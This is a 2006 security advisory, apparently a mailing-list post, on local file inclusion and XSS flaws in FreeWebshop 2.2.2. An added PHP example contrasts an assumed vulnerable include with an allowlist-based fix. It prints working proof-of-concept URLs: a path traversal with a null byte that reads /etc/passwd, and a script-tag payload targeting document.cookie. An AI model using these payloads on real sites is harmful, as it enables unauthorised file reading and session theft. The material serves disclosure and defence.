From: laurent gaffié <saps.audit_(at)_gmail.com>
Date: 09.11.2006
Subject: FreeWebshop <=2.2.2 [local file include & xss]

FreeWebshop <=2.2.2

severity: high
vendor site: http://www.freewebshop.org/
impact: an anonymous user can access any file on the remote server

PoC:
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00

xss get:
http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>

laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: saps.audit@gmail.com
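The advisory shows a "?page=" parameter reaching an include with a traversal sequence and a trailing null byte, plus a "cat" parameter reflected unescaped into HTML. The following is an added example written for this page, not FreeWebshop's code (the advisory does not show the application's source): the vulnerable include pattern is an assumption about how such a page dispatcher typically looks, and the hardened version restricts the include to an allowlist and escapes reflected output.

```php
<?php
// Added example, not FreeWebshop's code. The vulnerable shape below is an
// assumption about how a "?page=" dispatcher is usually written.

// Assumed vulnerable pattern: the user-controlled value reaches include()
// unchanged, so "../../../../etc/passwd%00" walks out of pages/ and, on the
// PHP versions of that era, the null byte truncates the appended ".php".
function render_page_vulnerable(string $page): void
{
    include 'pages/' . $page . '.php';
}

// Hardened version: only names from a fixed allowlist are ever included,
// so "..", "/" and "\0" never reach a filesystem call at all.
const ALLOWED_PAGES = ['home', 'browse', 'cart', 'contact'];

function resolve_page($page): string
{
    // Missing parameter, or ?page[]=... turning it into an array: use default.
    if (!is_string($page) || $page === '') {
        return 'home';
    }
    // Strict comparison against the allowlist rejects everything else.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return 'home';
    }
    return $page;
}

function render_page_safe($page): void
{
    $name = resolve_page($page);
    // Defense in depth: confirm the resolved file really lives under pages/.
    $base = realpath(__DIR__ . '/pages');
    $file = realpath($base . '/' . $name . '.php');
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        return;
    }
    include $file;
}

// Reflected values such as "cat" are escaped before they reach the HTML, so
// a value cannot close the surrounding <textarea> and inject script.
function echo_html(string $value): void
{
    echo htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

render_page_safe($_GET['page'] ?? null);
```

Disabling remote URL includes with allow_url_include=Off does not help against this bug, since the traversal stays on the local filesystem; the allowlist is the fix.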